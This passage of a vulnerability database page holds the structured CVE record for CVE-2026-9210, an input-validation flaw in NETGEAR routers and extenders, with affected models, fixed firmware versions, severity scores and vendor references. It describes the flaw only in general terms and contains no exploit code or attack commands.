https://www.netgear.com/support/product/rax20/ RAX35v2 Nighthawk AX4 4-Stream AX3000 WiFi 6 RouterV1.0.16.132RAX40v2 Nighthawk AX4 4-Stream WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax40v2/ RAX41 (EoS) Nighthawk AX5 5-Stream AX3600 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax41/ RAX42 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax42/ RAX43 (EoS) Nighthawk AX5 5-Stream AX4200 WiFi Router V1.0.12.120 https://www.netgear.com/support/product/rax43/ RAX45 (EoS) Nighthawk AX6 6-Stream AX4300 WiFi Router V1.0.12.118 https://www.netgear.com/support/product/rax45/ RAX48 Nighthawk AX6 6-Stream AX5200 WiFi 6 Router V1.0.12.118 https://www.netgear.com/support/product/rax48/ RAX50 Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50/ RAX50S Nighthawk AX6 6-Stream AX5400 WiFi 6 Router V1.0.12.120 https://www.netgear.com/support/product/rax50s/ RAXE450 Nighthawk AXE10000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe450/ RAXE500 Nighthawk AX12 12-Stream AXE11000 Tri-Band WiFi 6E Router V1.0.10.86 https://www.netgear.com/support/product/raxe500/ XR1000 Nighthawk WiFi 6 Pro Gaming Router V1.0.0.68 https://www.netgear.com/support/product/xr1000/ \n\nModels marked (EoS) have reached End-of-Support phase, and no security updates are planned. NETGEAR strongly recommends that you retire these devices and upgrade to a newer NETGEAR device for continued security support."
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Insufficient input validation in certain NETGEAR routers",
"x_generator": {
"engine": "Vulnogram 1.0.3"
}
}
},
"cveMetadata": {
"assignerOrgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"assignerShortName": "NETGEAR",
"cveId": "CVE-2026-0417",
"datePublished": "2026-06-09T15:50:49.507Z",
"dateReserved": "2025-12-03T04:16:24.254Z",
"dateUpdated": "2026-06-10T15:49:33.259Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2026-9210 (GCVE-0-2026-9210)
Vulnerability from cvelistv5 – Published: 2026-06-09 15:50 – Updated: 2026-06-11 05:38
VLAI
Title
Certain NETGEAR routers allow authenticated administrators to gain unintended control of the router
Summary
Insufficient input validation vulnerability in the listed NETGEAR models allows authenticated administrators connected to the local network to make unauthorized modification of router software and functionality.
Severity
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-20 - Improper input validation
Assigner
References
32 references
Impacted products
31 products
| Vendor | Product | Version | |
|---|---|---|---|
| NETGEAR | EX3700 |
Affected:
0 , < V1.0.0.100
(custom)
|
|
| NETGEAR | EX3800 |
Affected:
0 , < V1.0.0.100
(custom)
|
|
| NETGEAR | EX6120 |
Affected:
0 , < V1.0.0.72
(custom)
|
|
| NETGEAR | EX6130 |
Affected:
0 , < V1.0.0.54
(custom)
|
|
| NETGEAR | MR60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MR70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MR80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | MS60 |
Affected:
0 , < V1.1.7.132
(custom)
|
|
| NETGEAR | MS70 |
Affected:
0 , < V1.0.3.28
(custom)
|
|
| NETGEAR | MS80 |
Affected:
0 , < V1.1.7.14
(custom)
|
|
| NETGEAR | R6400v2 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6700v3 |
Affected:
0 , < V1.0.4.128
(custom)
|
|
| NETGEAR | R6900P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7000 |
Affected:
0 , < V1.0.11.216
(custom)
|
|
| NETGEAR | R7000P |
Affected:
0 , < V1.3.3.152
(custom)
|
|
| NETGEAR | R7960P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8000P |
Affected:
0 , < V1.4.4.92
(custom)
|
|
| NETGEAR | R8500 |
Affected:
0 , ≤ 1.0.2.160
(custom)
|
|
| NETGEAR | RAX20 |
Affected:
0 , < V1.0.18.144
(custom)
|
|
| NETGEAR | RAX35v2 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX40v2 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX41 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX42 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX43 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX45 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX48 |
Affected:
0 , < V1.0.12.118
(custom)
|
|
| NETGEAR | RAX50 |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAX50S |
Affected:
0 , < V1.0.12.120
(custom)
|
|
| NETGEAR | RAXE450 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | RAXE500 |
Affected:
0 , < V1.0.10.86
(custom)
|
|
| NETGEAR | XR1000 |
Affected:
0 , < V1.0.0.68
(custom)
|
Date Public
2026-06-09 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-9210",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-06-09T18:03:30.063423Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-06-09T18:39:39.151Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "EX3700",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.100",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EX3800",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.100",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EX6120",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.72",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "EX6130",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.54",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MR80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS60",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.132",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS70",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.3.28",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "MS80",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.1.7.14",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6400v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6700v3",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.4.128",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R6900P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.11.216",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.3.3.152",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R7960P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8000P",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.4.4.92",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "R8500",
"vendor": "NETGEAR",
"versions": [
{
"lessThanOrEqual": "1.0.2.160",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX20",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.18.144",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX35v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX40v2",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX41",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX42",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX43",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX45",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX48",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.118",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAX50S",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.12.120",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE450",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "RAXE500",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.10.86",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unaffected",
"product": "XR1000",
"vendor": "NETGEAR",
"versions": [
{
"lessThan": "V1.0.0.68",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3700:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.100",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.100",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.72",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.54",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mr60:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.132",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mr70:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.3.28",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:mr80:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.14",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ms60:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.132",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ms70:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.3.28",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ms80:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.1.7.14",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400v2:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.4.128",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700v3:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.4.128",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.3.3.152",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.11.216",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.3.3.152",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7960p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.4.4.92",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.4.4.92",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:*:*:*:*:*:*:*:*",
"versionEndIncluding": "*",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax20:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.18.144",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax35v2:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax40v2:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax41:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax42:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax43:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.120",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax45:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax48:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.118",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax50:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.120",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:rax50s:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.12.120",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:raxe450:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.10.86",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:raxe500:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.10.86",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:xr1000:*:*:*:*:*:*:*:*",
"versionEndExcluding": "v1.0.0.68",
"versionStartIncluding": "0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "OR"
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "pjqwudi"
}
],
"datePublic": "2026-06-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cdiv\u003e\u003cp\u003eInsufficient input validation vulnerability in the\u0026nbsp;listed NETGEAR models allows\u0026nbsp;authenticated administrators connected to the local network to make unauthorized modification of router software and functionality.\u003c/p\u003e\u003c/div\u003e"
}
],
"value": "Insufficient input validation vulnerability in the\u00a0listed NETGEAR models allows\u00a0authenticated administrators connected to the local network to make unauthorized modification of router software and functionality."
}
],
"impacts": [
{
"capecId": "CAPEC-122",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-122 Privilege Abuse"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "ADJACENT",
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "UNREPORTED",
"privilegesRequired": "NONE",
"providerUrgency": "AMBER",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "DIFFUSE",
"vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U/V:D/RE:L/U:Amber",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "LOW"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper input validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-06-11T05:38:03.646Z",
"orgId": "a2826606-91e7-4eb6-899e-8484bd4575d5",
"shortName": "NETGEAR"
},
"references": [
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex3700/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex3800/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex6120/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ex6130/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms60/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/ms80/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/mr70/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6400v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6700v3/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r6900p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7960p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000p/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r8000p/"
},
{
"tags": [
"product"
],
"url": "https://www.netgear.com/support/product/r8500/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax48/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/r7000/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax40v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax20/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax35v2/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax41/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax42/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax45/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax43/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/rax50s/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe450/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/raxe500/"
},
{
"tags": [
"product",
"patch"
],
"url": "https://www.netgear.com/support/product/xr1000/"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://kb.netgear.com/000070811/June-2026-NETGEAR-Security-Advisory"
}
],
"solutions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eDevices with automatic updates enabled may already have this patch applied. If not, please check the firmware version and update it to the latest. Fixed in:\u003c/p\u003e\u003ctable\u003e\u003cthead\u003e\u003ctr\u003e\u003cth\u003eProduct\u003c/th\u003e\u003cth\u003eFixed Version\u003c/th\u003e\u003c/tr\u003e\u003c/thead\u003e\u003ctbody\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX3700\u003c/b\u003e AC750 WiFi Range Extender Essentials Edition\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex3700/\"\u003eV1.0.0.100\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX3800 (EoS)\u003c/b\u003e AC750 WiFi Range Extender Essentials Edition\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex3800/\"\u003eV1.0.0.100\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX6120\u003c/b\u003e AC1200 Dual Band WiFi Range Extender\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex6120/\"\u003eV1.0.0.72\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eEX6130\u003c/b\u003e AC1200 WiFi Range Extender\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ex6130/\"\u003eV1.0.0.54\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR60\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR70\u003c/b\u003e Nighthawk Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMR80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/mr80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS60\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms60/\"\u003eV1.1.7.132\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS70\u003c/b\u003e Nighthawk Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms70/\"\u003eV1.0.3.28\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eMS80\u003c/b\u003e Nighthawk Tri-band Mesh WiFi 6 Add-on Satellite\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/ms80/\"\u003eV1.1.7.14\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6400v2 (EoS)\u003c/b\u003e AC1750 Smart WiFi Router 802.11ac Dual Band Gigabit\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6400v2/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6700v3 (EoS)\u003c/b\u003e Nighthawk AC1750 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6700v3/\"\u003eV1.0.4.128\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR6900P (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r6900p/\"\u003eV1.3.3.152\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000 (EoS)\u003c/b\u003e Nighthawk AC1900 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca href=\"https://www.netgear.com/support/product/r7000/\"\u003eV1.0.11.216\u003c/a\u003e\u003c/td\u003e\u003c/tr\u003e\u003ctr\u003e\u003ctd\u003e\u003cb\u003eR7000P (EoS)\u003c/b\u003e Nighthawk AC2300 Smart WiFi Dual Band Gigabit Router\u003c/td\u003e\u003ctd\u003e\u003ca 